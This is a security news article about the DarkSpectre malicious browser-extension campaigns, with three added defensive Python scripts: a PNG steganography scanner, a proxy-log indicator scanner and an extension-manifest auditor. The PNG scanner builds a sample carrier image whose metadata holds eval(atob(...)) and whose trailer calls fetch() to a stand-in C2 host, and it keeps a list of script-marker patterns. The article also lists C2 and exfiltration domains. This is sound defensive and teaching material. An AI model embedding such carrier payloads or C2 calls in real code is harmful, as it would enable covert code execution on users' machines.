8.8 Million Chrome, Edge And Opera Users Compromised
If you use Google Chrome, Microsoft Edge, or Opera, this news might concern you. Over 8.8 million browser users were compromised through malicious extensions in one of the largest campaigns ever uncovered. In this 2026 rewrite, we break down what happened, who was behind it, and how you can protect yourself moving forward.
The DarkSpectre Threat Group
A newly identified Chinese-linked threat actor, known as DarkSpectre, has been connected to one of the most widespread browser extension malware operations ever discovered. According to cybersecurity researchers at Koi.ai, this operation silently infected users over a seven-year period, targeting popular browsers without raising suspicion.
Key Entities Involved
- DarkSpectre (Threat Group)
- Koi.ai (Cybersecurity Research Firm)
- Google Chrome
- Microsoft Edge
- Mozilla Firefox
- Opera Browser
What makes this campaign alarming is its scale, patience, and sophistication. Instead of quick attacks, DarkSpectre focused on long-term persistence, blending into trusted browser ecosystems.
How the Malware Operation Worked
DarkSpectre did not rely on a single malware strain. Instead, it orchestrated three interconnected campaigns, each designed for a specific purpose but working toward a shared intelligence-gathering goal.
The Three Campaigns at a Glance
| Campaign Name | Infected Users | Primary Goal | Browsers Targeted |
|---|---|---|---|
| ShadyPanda | 5.6 million | Surveillance & affiliate fraud | Chrome, Edge |
| GhostPoster | 1+ million | Stealth code execution | Firefox, Opera |
| Zoom Stealer | 2.2 million | Corporate espionage | Chrome, Edge |
Together, these campaigns formed a coordinated malware ecosystem, not isolated attacks.
ShadyPanda Campaign: Silent Surveillance at Scale
The ShadyPanda campaign was the largest and most damaging component, responsible for over 5.6 million infections.
How ShadyPanda Tricked Users
The malicious extensions were disguised as:
- New tab customizers
- Language translation tools
- Productivity add-ons
Many of these extensions appeared completely legitimate and even remained clean for years before activating malicious behavior.
What Happened After Installation
Once installed, the extensions:
- Contacted command-and-control (C2) servers
- Downloaded hidden configurations
- Injected remote JavaScript
- Hijacked search results
- Monitored browsing behavior
Known Malicious Domains
- jt2x.com
- infinitynewtab.com
These domains allowed attackers to update payloads remotely, making detection extremely difficult.
GhostPoster Campaign: Malware Hidden Inside Images
The GhostPoster campaign took stealth to another level by using steganography, a technique where malicious code is hidden inside image files.
Why This Technique Was Dangerous
Instead of loading suspicious scripts, the extensions:
- Embedded JavaScript inside PNG images
- Appeared harmless to security scanners
- Remained dormant for days after installation
After the delay, the malware extracted and executed the hidden payload.
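The defensive counterpart to this technique is to treat every image shipped inside an extension package as a possible carrier. The script below is an added example, not code from the article or from the Koi.ai research: it parses the PNG chunk structure with the standard library only and flags the places a payload can hide (bytes appended after the IEND chunk, non-standard chunk types, or script-like text in metadata chunks). The sample PNGs are constructed inline; the script-marker list is a heuristic and the chunk layout follows the PNG specification.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Chunk types a normal encoder emits; anything else deserves a closer look.
STANDARD_CHUNKS = {b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tEXt", b"zTXt", b"iTXt", b"tRNS",
                   b"gAMA", b"cHRM", b"sRGB", b"iCCP", b"bKGD", b"pHYs", b"sBIT", b"hIST",
                   b"tIME", b"sPLT", b"eXIf"}
# Tokens that have no business inside image metadata (a heuristic, not a JS parser).
SCRIPT_MARKERS = (b"eval(", b"function(", b"document.", b"fetch(", b"XMLHttpRequest", b"atob(")


def looks_like_script(blob):
    return any(marker in blob for marker in SCRIPT_MARKERS)


def parse_png(data):
    """Return (chunks, end_offset): chunks as (type, payload, crc_ok); end_offset is where IEND ends."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    chunks, pos = [], len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if pos + 12 + length > len(data):
            break  # declared length runs past end of file: truncated or malformed
        payload = data[pos + 8:pos + 8 + length]
        crc_stored = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])[0]
        chunks.append((ctype, payload, crc_stored == zlib.crc32(ctype + payload)))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks, pos


def scan_png(data):
    """List the reasons a PNG looks like a carrier rather than a picture; an empty list means clean."""
    findings = []
    chunks, end = parse_png(data)
    if not chunks or chunks[-1][0] != b"IEND":
        findings.append("no IEND chunk: truncated or malformed file")
    for ctype, payload, crc_ok in chunks:
        name = ctype.decode("latin-1")
        if ctype not in STANDARD_CHUNKS:
            findings.append(f"non-standard chunk {name} ({len(payload)} bytes)")
        if not crc_ok:
            findings.append(f"bad CRC on {name} chunk")
        # zTXt is zlib-compressed and is not inspected here; tEXt/iTXt carry plain text.
        if ctype in (b"tEXt", b"iTXt") and looks_like_script(payload):
            findings.append(f"script-like content in {name} chunk")
    trailing = data[end:]
    if trailing:
        findings.append(f"{len(trailing)} bytes appended after IEND")
        if looks_like_script(trailing):
            findings.append("script-like content in trailing bytes")
    return findings


# --- constructed samples for this example (not real GhostPoster artefacts) ---
def _chunk(ctype, payload):
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", zlib.crc32(ctype + payload))


def build_sample_png(extra_chunks=(), trailer=b""):
    """A valid 1x1 greyscale PNG; extra_chunks go before IDAT, trailer is appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit, greyscale, no interlace
    idat = zlib.compress(b"\x00\x80")                      # filter byte + one pixel
    body = _chunk(b"IHDR", ihdr)
    for ctype, payload in extra_chunks:
        body += _chunk(ctype, payload)
    body += _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")
    return PNG_SIG + body + trailer


CLEAN_PNG = build_sample_png()
CARRIER_PNG = build_sample_png(
    extra_chunks=[(b"tEXt", b"Comment\x00eval(atob('ZmFrZQ=='))")],
    trailer=b"/*stage2*/function(){fetch('https://c2.example.invalid/cfg')}",
)

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_PNG), ("carrier", CARRIER_PNG)):
        print(label, scan_png(blob) or ["no findings"])
```

Trailing bytes or an unusual chunk are a reason to pull the file for review, not proof of malice on their own: some editors append metadata after IEND, and legitimate ICC or EXIF data can be large. The combination that matters in an extension package is image data plus executable-looking text plus a script elsewhere in the bundle that reads that image back.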
Impact of GhostPoster
- Affected over one million users
- Enabled remote code execution
- Avoided traditional detection tools
Infrastructure Used
- gmzdaily.com
- mitarchive.info
This approach shows how browser-based attacks have evolved beyond basic script injection.
The Zoom Stealer Campaign: Corporate Espionage Explained
The most recent and arguably most dangerous operation was the Zoom Stealer campaign, which targeted corporate users rather than casual browsing activity.
How Zoom Stealer Operated
The extensions posed as:
- Video downloaders
- Productivity enhancers
- Meeting tools
Behind the scenes, they harvested sensitive corporate data from 28+ video conferencing platforms.
Platforms Affected
- Zoom
- Microsoft Teams
- Google Meet
- Webex
- Skype
Data Collected
- Meeting links
- Login credentials
- Speaker identities
- Organizational metadata
This information could be used for corporate espionage, phishing, or insider reconnaissance.
Data Exfiltration & Cloud Abuse
One of the most alarming discoveries was how attackers transmitted stolen data.
Technologies Used
- WebSocket connections (real-time data transfer)
- Google Firebase databases
- Google Cloud Functions
Known Endpoints
- zoocorder.firebaseio.com
- webinarstvus.cloudfunctions.net
By abusing trusted cloud platforms, DarkSpectre blended malicious traffic with legitimate services — a major challenge for security teams.
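Because the exfiltration rode on Google-owned infrastructure, blocking the platforms outright is rarely an option; the practical control is to separate known indicators from traffic that merely needs context. The script below is an added example, not from the article or from the Koi.ai research: it scans proxy log lines, flags the endpoints and C2 domains listed on this page as high severity, and marks other WebSocket or POST traffic to Firebase or Cloud Functions hosts for review unless the destination is on a WebSocket allowlist. The log format, the allowlist, the timestamps, client addresses and every host not named on the page are constructed placeholders.

```python
from dataclasses import dataclass

# Infrastructure the Koi.ai research attributes to DarkSpectre (the domains listed on this page).
KNOWN_C2 = {"jt2x.com", "infinitynewtab.com", "gmzdaily.com", "mitarchive.info"}
KNOWN_EXFIL = {"zoocorder.firebaseio.com", "webinarstvus.cloudfunctions.net"}
# Legitimate Google platforms the campaign hid behind; traffic there needs context, not an automatic block.
ABUSED_PLATFORMS = ("firebaseio.com", "cloudfunctions.net")


@dataclass
class Finding:
    severity: str  # "high" = known indicator, "review" = needs an analyst's look
    ts: str
    src: str
    host: str
    reason: str


def in_domain(host, domain):
    return host == domain or host.endswith("." + domain)


def parse_line(line):
    """Constructed proxy log format: '<ts> <src_ip> <method> <host> <path> <scheme>'."""
    parts = line.split()
    if len(parts) != 6:
        return None
    ts, src, method, host, path, scheme = parts
    return {"ts": ts, "src": src, "method": method.upper(),
            "host": host.lower(), "path": path, "scheme": scheme.lower()}


def classify(ev, ws_allowlist):
    host, is_ws = ev["host"], ev["scheme"] in ("ws", "wss")
    if any(in_domain(host, d) for d in KNOWN_C2 | KNOWN_EXFIL):
        return Finding("high", ev["ts"], ev["src"], host, "known DarkSpectre infrastructure")
    if is_ws and any(in_domain(host, a) for a in ws_allowlist):
        return None  # sanctioned real-time service (chat, collaboration, etc.)
    if any(in_domain(host, p) for p in ABUSED_PLATFORMS) and (is_ws or ev["method"] == "POST"):
        return Finding("review", ev["ts"], ev["src"], host,
                       "data pushed to a cloud backend not on the allowlist")
    if is_ws:
        return Finding("review", ev["ts"], ev["src"], host, "WebSocket to a host not on the allowlist")
    return None


def scan_log(lines, ws_allowlist):
    """Run every parseable line through classify() and keep the hits, in log order."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        f = classify(ev, ws_allowlist)
        if f is not None:
            findings.append(f)
    return findings


# Constructed sample data; hosts other than the known indicators above are placeholders.
WS_ALLOWLIST = {"slack.com", "teams.microsoft.com"}
SAMPLE_LOG = """\
2026-01-12T09:14:03Z 10.0.4.17 GET zoom.us /j/1234567890 https
2026-01-12T09:14:05Z 10.0.4.17 GET zoocorder.firebaseio.com /.ws wss
2026-01-12T09:14:09Z 10.0.4.17 POST webinarstvus.cloudfunctions.net /collect https
2026-01-12T09:15:41Z 10.0.4.22 GET example-app.firebaseio.com /.ws wss
2026-01-12T09:16:02Z 10.0.4.22 GET slack.com /websocket wss
2026-01-12T09:17:30Z 10.0.4.22 GET relay.example.invalid /socket wss
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines(), WS_ALLOWLIST):
        print(f"{f.severity:6} {f.ts} {f.src} -> {f.host}: {f.reason}")
```

The "review" tier is where the allowlist earns its keep: a corporate application that legitimately uses Firebase will show up there on day one, and adding it to the allowlist turns the rule from noise into a signal for the next unknown backend. Known indicators should be matched with suffix logic, as above, so subdomains of a listed domain are caught as well.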
Why Browser Extension Attacks Are Increasing in 2026
Browser extensions remain a high-value attack surface because:
- Users blindly trust official extension stores
- Permissions are often excessive
- Security reviews are inconsistent
Common Risk Factors
- “Read and change all your data” permissions
- Poor update monitoring
- Abandoned extensions sold to attackers
How to Protect Yourself from Malicious Extensions
Best Practices for Browser Security
- Install extensions only from verified developers
- Avoid extensions with unnecessary permissions
- Regularly audit installed add-ons
- Remove unused extensions immediately
Enterprise-Level Recommendations
- Use browser extension allowlists
- Monitor outbound WebSocket traffic
- Deploy endpoint detection solutions
- Conduct regular extension reviews
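The behaviours described under ShadyPanda (remote configuration, injected remote JavaScript, contact with the listed C2 domains), the risk factors above (all-sites permissions, unmonitored updates) and the enterprise recommendations (allowlists, regular reviews) all come down to what an extension's manifest declares. The script below is an added example, not code from the article or from any browser vendor: it audits a manifest against an allowlist of extension IDs, reports permissions that grant "read and change all your data" access, high-risk APIs, a content security policy that admits remote script sources or eval, and any reference to the domains named on this page, and can walk a Chromium profile's Extensions directory. The two manifests, the extension IDs and the allowlist are constructed; the on-disk layout `Extensions/<id>/<version>/manifest.json` is an assumption to adjust for your browser.

```python
import json
import os

# Host patterns that trigger the "Read and change all your data on all websites" warning.
ALL_SITES = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# APIs that let an extension rewrite pages, redirect searches or observe every request.
HIGH_RISK_APIS = {"webRequest", "webRequestBlocking", "declarativeNetRequest", "scripting",
                  "tabs", "cookies", "webNavigation", "history", "proxy"}
# Domains named on this page as DarkSpectre infrastructure.
KNOWN_BAD_DOMAINS = {"jt2x.com", "infinitynewtab.com", "gmzdaily.com", "mitarchive.info"}


def pattern_hits(pattern, domain):
    """True if a match pattern or CSP source such as '*://*.jt2x.com/*' points at domain."""
    host = pattern.split("://", 1)[-1].split("/", 1)[0].lstrip("*.")
    return host == domain or host.endswith("." + domain)


def csp_sources(manifest):
    csp = manifest.get("content_security_policy", "")
    if isinstance(csp, dict):  # Manifest V3 shape: {"extension_pages": "...", "sandbox": "..."}
        csp = " ".join(csp.values())
    return csp.replace(";", " ").split()


def audit_manifest(ext_id, manifest, allowlist=frozenset()):
    """Return a list of human-readable issues; an empty list means nothing to report."""
    issues = []
    if ext_id not in allowlist:
        issues.append("not on the extension allowlist")
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    matches = [m for cs in manifest.get("content_scripts", []) for m in cs.get("matches", [])]
    hosts = {p for p in perms if "://" in p or p == "<all_urls>"} | set(matches)
    if hosts & ALL_SITES:
        issues.append("can read and change data on all websites")
    risky = sorted(perms & HIGH_RISK_APIS)
    if risky:
        issues.append("high-risk API permissions: " + ", ".join(risky))
    sources = csp_sources(manifest)
    remote = [s for s in sources if s.startswith(("http://", "https://"))]
    if remote:
        issues.append("CSP allows remote script sources: " + ", ".join(remote))
    if "'unsafe-eval'" in sources:
        issues.append("CSP allows eval of downloaded code")
    for bad in sorted(KNOWN_BAD_DOMAINS):
        if any(pattern_hits(h, bad) for h in hosts | set(remote)):
            issues.append(f"references known DarkSpectre domain {bad}")
    return issues


def audit_profile(extensions_dir, allowlist=frozenset()):
    """Walk Extensions/<id>/<version>/manifest.json (assumed Chromium layout) and audit each one."""
    report = {}
    for ext_id in sorted(os.listdir(extensions_dir)):
        ext_path = os.path.join(extensions_dir, ext_id)
        if not os.path.isdir(ext_path):
            continue
        for version in sorted(os.listdir(ext_path)):
            mpath = os.path.join(ext_path, version, "manifest.json")
            if os.path.isfile(mpath):
                with open(mpath, encoding="utf-8-sig") as fh:  # some manifests carry a BOM
                    report[f"{ext_id}@{version}"] = audit_manifest(ext_id, json.load(fh), allowlist)
    return report


# Constructed manifests and IDs for this example.
ALLOWLIST = {"corp-notes-id"}
CORP_NOTES = {"manifest_version": 3, "name": "Corporate Notes", "permissions": ["storage"],
              "host_permissions": ["https://notes.example.com/*"]}
SHADY_NEWTAB = {"manifest_version": 2, "name": "Pretty New Tab",
                "permissions": ["tabs", "webRequest", "webRequestBlocking", "<all_urls>"],
                "chrome_url_overrides": {"newtab": "tab.html"},
                "content_scripts": [{"matches": ["*://*/*"], "js": ["inject.js"]}],
                "content_security_policy":
                    "script-src 'self' https://jt2x.com 'unsafe-eval'; object-src 'self'"}

if __name__ == "__main__":
    for ext_id, manifest in (("corp-notes-id", CORP_NOTES), ("shady-newtab-id", SHADY_NEWTAB)):
        print(manifest["name"], audit_manifest(ext_id, manifest, ALLOWLIST) or ["no issues"])
```

The audit answers the question the FAQ poses ("how can I check if an extension is malicious?") only in part: a manifest tells you what an extension may do, not what it does, and an extension that was clean for years can gain new permissions in an update. Run the profile walk on a schedule and diff the output against the previous run so that newly added permissions, CSP changes and new domains stand out as events rather than as a static list.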
FAQs
What is DarkSpectre malware?
DarkSpectre is a Chinese-linked threat group responsible for infecting millions of users through malicious browser extensions.
Which browsers were affected?
Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera were all targeted.
How can I check if an extension is malicious?
Review permissions, developer history, update behavior, and uninstall extensions you no longer need.
Are official extension stores safe?
They are safer than third-party sites, but not completely risk-free.
Can browser malware steal corporate data?
Yes. The Zoom Stealer campaign proves browser extensions can be used for corporate espionage.
Conclusion
The compromise of 8.8 million browser users is a wake-up call for both individuals and organizations. As browser extensions grow more powerful, attackers are exploiting trust at an unprecedented scale.